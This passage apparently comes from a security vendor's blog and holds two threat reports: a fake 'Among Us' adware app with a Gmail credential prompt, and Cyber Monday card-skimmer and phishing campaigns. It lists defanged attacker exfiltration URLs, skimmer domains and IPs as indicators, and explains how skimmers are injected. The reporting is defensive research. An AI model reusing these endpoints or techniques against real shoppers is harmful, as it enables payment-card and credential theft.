features required for an Android device. Soon after downloading the app, the user is bombarded with advertisements. There is no gaming functionality; the app is simply adware with the potential functionality to steal Gmail credentials. The app asks users to log in or register using Gmail credentials, but the current version does not send the credentials to the attacker. This functionality seems to be under development and could be activated with future updates. Such functionality could be devastating, providing attackers with access to volumes of personal and financial information. App details App Name: Amoungus Package Name: Hash: 3d1e6b84b50e9dbcfdc6b609aa57d28fa06f78e1f3cd9285e07ba8e39f419bfb Technical details The app portrays itself as the Among Us Android game app. [Disclaimer: This blog will be discussing the technical details of the fake app Amoungus, discovered on the Google Play store, not the real Among Us app.] As shown in Figure 1, the left image is of the actual game (which has around 100 million downloads), and the right is the fake app. Figure 1: The real Among Us vs. the fake app on Google Play. When checking the user reviews for the fake app, it becomes pretty obvious that the app is not doing what is described on the Google Play description page. Figure 2 shows some user reviews, which clearly indicate that this is a potentially unwanted app (PUA). Figure 2: User reviews for the Amoungus app on Google Play. Upon installation, the app appears to be downloading additional game features, as well as loading and processing those features. This is a common activity in other games, such as PUBG, Call Of Duty, Asphalt, and more, in which the game loads additional features from the server to enhance gameplay or improve functionality. This activity tricks the user into thinking this app is an actual game. Figure 3 shows this functionality in action. Figure 3: The initial downloading and processing activities of the Amoungus app. In reality, these are nothing more than videos created by the attacker to mimic game functionality. Figure 4 shows how this functionality is used and how the videos are loaded from the Resources directory. Figure 4: The videos for this fake app are stored in the Resources directory. The app also sends details about the user's device to the server. Some of the details include: Android SDK version Android model Network operator name Device manufacturer Cell signal level Height and width of the Android display Device root details Time since last boot Device RAM status The user is then bombarded with advertisements, as seen in Figure 5. Figure 5: Some of the ads sent to the victim. One unique feature of this app is the functionality to steal Gmail credentials. The app asks the user to log in or register using a Gmail user name and password, although the stolen credentials are not sent back to the attacker. This functionality seems to be under development and hypothetically could be an ideal way to thwart Google Play's detection, as the current version of the app doesn't steal data, but later updates might include this functionality. Figure 6: The login and register screens of the fake app. When trying to log in or register, the user is reverted to the login page on a continuous loop. Figure 7 shows the functionality where the user is looped around the same process once a user name and password are provided. Figure 7: The login or register functionality on a continuous loop. Further research showed that the developer had other fake apps on Google Play mimicking other famous apps. We analyzed the other fake apps and found that they all behaved in the same fashion as the fake Among Us app. Initially, videos are played showing the downloading and processing activity, and the user is bombarded with ads along with Gmail ID and password prompts, which again are sent nowhere. Figure 8 shows other apps from the same developer. Figure 8: Other fake apps on Google Play by the developer of Amoungus. Listed below are the names of the fake apps shown in Figure 8 with their approximate numbers of downloads. Fauji Game:10,000+ Lite for Resident Evil: 10,000+ Like for Call of Fire: 50+ Amoungus: 5,000+ Fdnmg: 1+ Betok Indian Short Videos: 10+ Clash of Coins: 10+ Battle Royale Action Game: 5,000+ Based on the game names, the developer(s) seem to be targeting Indian users. Fauji is a battle royale game that is supposed to launch in India as an alternative to PUBG. Another app is named Betok Indian Short Videos with an icon similar to TikTok. Fdnmg appears to be in the very early stages of development. Looking at the package name, the developer seems to be targeting this app as a fake PUBG-related app, as shown in Figure 9. Figure 9: This fake app appears to be in the very early development stage. Again, this app is no different than the other fake apps. It flashes videos and soon asks for a Gmail ID and password, while bombarding the victim with ads. Figure 10: As with the other fake apps, the videos are stored in the Registry directory. Similar to the other fake apps, this app does not send the Gmail credentials anywhere. But this functionality is likely under development, and the next update might actually steal the credentials. We have reported these apps, and Google's android security team promptly removed them from the Google Play store. Conclusion Despite Google's diligent efforts, miscreants still manage to plunge potentially unwanted apps (PUAs) onto Google's official Android store, Google Play. While Google tries its best to protect Android users worldwide, it is also the responsibility of Android users to be vigilent when installing apps. We advise users to download and install Android apps from official stores, such as Google Play. But there can be scenarios where PUAs enter into official stores. To help avoid downloading PUAs: Be sure to read user reviews before installing any app. Do not simply allow any random permissions that an app may demand. For example, it makes no sense for a calculator app to ask for the "READ_SMS" permission Always disable the "Unknown Sources" option so that any random app cannot further install apps from third-party sources. If an app does not act as described, immediately uninstall it and report the app to Google. Fri, 04 Dec 2020 07:58:49 -0800 Shivang Desai Cyber Monday: Shopping Scams and Skimmers As Black Friday and Cyber Monday, the biggest shopping days of the year, are just behind us, Zscaler has noticed that the attackers have taken advantage of this holiday activity for their targeted cybercrimes. This year has been unprecedented especially with everyone staying home because of Covid-19 and involving in more online shopping that has never seen previously. Zscaler cloud on an average processes around 130 billion customer transactions daily, and this gives us an insight into activity trends happening across the internet. Since the beginning of this month, we have noticed an increase in online shopping activity leading up to the holidays. We especially noticed a significant uptick in this activity on Cyber Monday (11/30) as expected. Figure 1: Shopping transactions on Zscaler cloud seen increasing from 750 million to 1.13 billion from the first week of this month. Skimmer Activity Cyber Monday and Black Friday have always been a target for cyber criminals in many different ways including phishing, scams and also by compromising e-commerce websites for injecting malicious card skimmers to steal payment card information. Card skimmer groups remain active throughout the year and during the holidays a spike in such attacks are a norm. ThreatLabz researchers have been monitoring this sudden spike in cyber attacks during the weeks leading to Cyber Monday previous years as well. In this section, we will discuss some of the card skimmer attacks that our team has seen in the wild. 1. While monitoring attacks related to the Cyber Monday and Black Friday ThreatLabz team came across an online footwear store offering discounts for Cyber Monday and was infected with a card skimmer. Figure 2: e-commerce store offering Cyber Monday sale. Figure 3: Injected obfuscated skimmer script. The domain jblackfriday2017[.]com was previously registered in 2017 and has been active ever since while offering discounts for Cyber Monday. This e-commerce website is hosted on 139.60.163[.]88, which hosts multiple similar footwear e-commerce websites and all are infected with the same skimmer script. All these footwear online stores are offering different types of sale and discounts. These e-commerce websites are running outdated Magento software and were compromised a few months ago and are still seen serving the skimmer script. Skimmer script in all these e-commerce websites is appended to the same JavaScript file i.e. <Domain>/js/varien/form.js and the collected data is sent back to the attacker’s controlled IP address: 103.139.113[.]34. Data exfiltration URL: 103.139.113[.]34/check_error.php?discounts= Following are other similar e-commerce websites related to footwear, using the same theme and are infected with the above discussed skimmer. 2. Skimmer groups most of the time use newly registered domains, lexically close to any web service or web analytics service in order to remain undetected for long and infect multiple e-commerce websites. ThreatLabz researchers have recently seen such newly registered domains used by skimmer groups to infect e-commerce stores offering Cyber Monday and Black Friday sale and one such is discussed below. Figure 4: e-commerce website offering Black Friday sale. The skimmer script injected into the e-commerce website is hosted on a newly registered domain and is highlighted below. Figure 5: Obfuscated malicious script injected to the e-commerce store. Skimmer Domain: googleplus[.]name Creation Date: 2020-11-03 Skimmer script has base-64 encoded fake payment form, which is injected as an iframe at the checkout and the payment card details are sent to the attacker controlled server. Data exfiltration URL : hxxps://googleplus[.]name/google.php Figure 6: Base-64 encoded fake payment form. 3. Skimmer groups generally use the newly registered domain to infect multiple e-commerce websites but this is not always the case as we have seen that few Magecart groups targeting specific e-commerce websites register a malicious domain lexically close to the target website. “Giantmicrobes”, a toy company that offers lots of goods related to healthcare has been a victim of this attack as well. Below is a screenshot of the source code from Giantmicrobes website. The screenshot shows a highlighted reference to an external JavaScript file and the domain looks legitimate but taking a closer look reveals that it is lexically close to the legitimate domain. Figure 7: Skimmer script injected to the legitimate e-commerce website. Legitimate Domain : giantmicrobes[.]com Skimmer Domain : giantnicrobes[.]com Creation date: 2020-10-28 Registrar : NAMECHEAP INC NameCheap, Inc. Injected JavaScript from the malicious domain is obfuscated and following is the exfiltration URL. Figure 8: Deobfuscated malicious skimmer script We analyzed more variants of this skimmer script and detected more such targeted attacks. The Cheesecake shop ([.]au), an online bakery store, was hit by a similar targeted skimmer last month but was cleaned up later on. Legitimate Domain : cheesecake[.]com[.]au Skimmer Domain: cneesecaka[.]com Creation date: 2020-10-20 Registrar : 1API GmbH The malicious domain cneesecaka[.]com was later used to target multiple other e-commerce websites related to automobile parts, electronics and others. 4. Data exfiltration is also sometimes done via newly registered domains. API services of popular platforms like google analytics and telegram have been seen being utilized in data exfiltration by the attackers. In a few different variants of the above discussed skimmer, we have observed that the stolen data from one compromised Magento site is sent to another compromised Magento site. Figure 9: Malicious skimmer script injected on the Magento platform Following is the deobfuscated script with the Gate URL of another e-commerce website. Figure 10: Deobfuscated malicious skimmer script. Figure 11: Data exfiltration to another compromised Magento website. Phishing As we have seen over the previous years, attackers use BlackFriday themed domains for phishing user credentials. One such domain we came across is “blackfriday2020[.]pro”, hosting a login page. The same login page was previously seen on multiple sites, according to urlscan. Figure 12: Multiple sites hosting the same login page Black Friday offers are also huge all over the world. Jumia[.]com[.]ng is an online marketplace based out of Nigeria. The image below shows a phishing site (jumia-blackfridayoffers[.]com) claiming to offer Black Friday deals. Notice the absence of a valid certificate. The legitimate vendor domain is registered to "Ecart Internet Services Nigeria Limited". Figure 13: Phishing page mimicking Jumia marketplace. Targeting Sport Fans Fans of various sports and their teams should be cautious while purchasing their favorite team/player jersey online. We have noticed multiple domains recently registered specifically for scamming the sports’ fans of MLB, NCAA, NHL, NBA, NFL, and more. A snapshot of some of these domains can be seen below. Figure 14: New Registered Domains related to sports jerseys Conclusion Zscaler ThreatLabZ team actively tracks campaigns targeting online shoppers and provides coverage to ensure that our customers are protected from these kinds of attacks. Even though Black Friday and Cyber Monday are behind us, most of the holiday sales continue till the end of this week (Cyber Week). Users actively engaging in online shopping should be cautious and follow basic safe guidelines to protect their information & money while purchasing anything online: Verify the authenticity of the URL or website before opening it. Be wary of links with typos. Ensure online retailers and banking sites that you are shopping from are utilizing HTTPS/secure connections Enable two-factor authentication, or “2FA,” to provide an additional layer of security, especially for sensitive accounts related to financial transactions. As a rule of thumb, don't click links or open documents from unknown parties who promise exciting offers and opportunities. Avoid visiting URL shortener links. Always ensure that your operating system and web browser are up to date and have the latest security patches installed. Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious websites bombard visitors with pop-up ads). Only download apps from official app stores, such as Google or Apple. Avoid using public or unsecured Wi-Fi connections for shopping. Backup your documents and media files. You can always go the extra mile by encrypting your files. Review helpful instructions by the Federal Trade Commission (FTC) on Identity Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware. Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message. Report any incidents to the FTC. Wed, 02 Dec 2020 15:46:33 -0800 Prakhar Shrotriya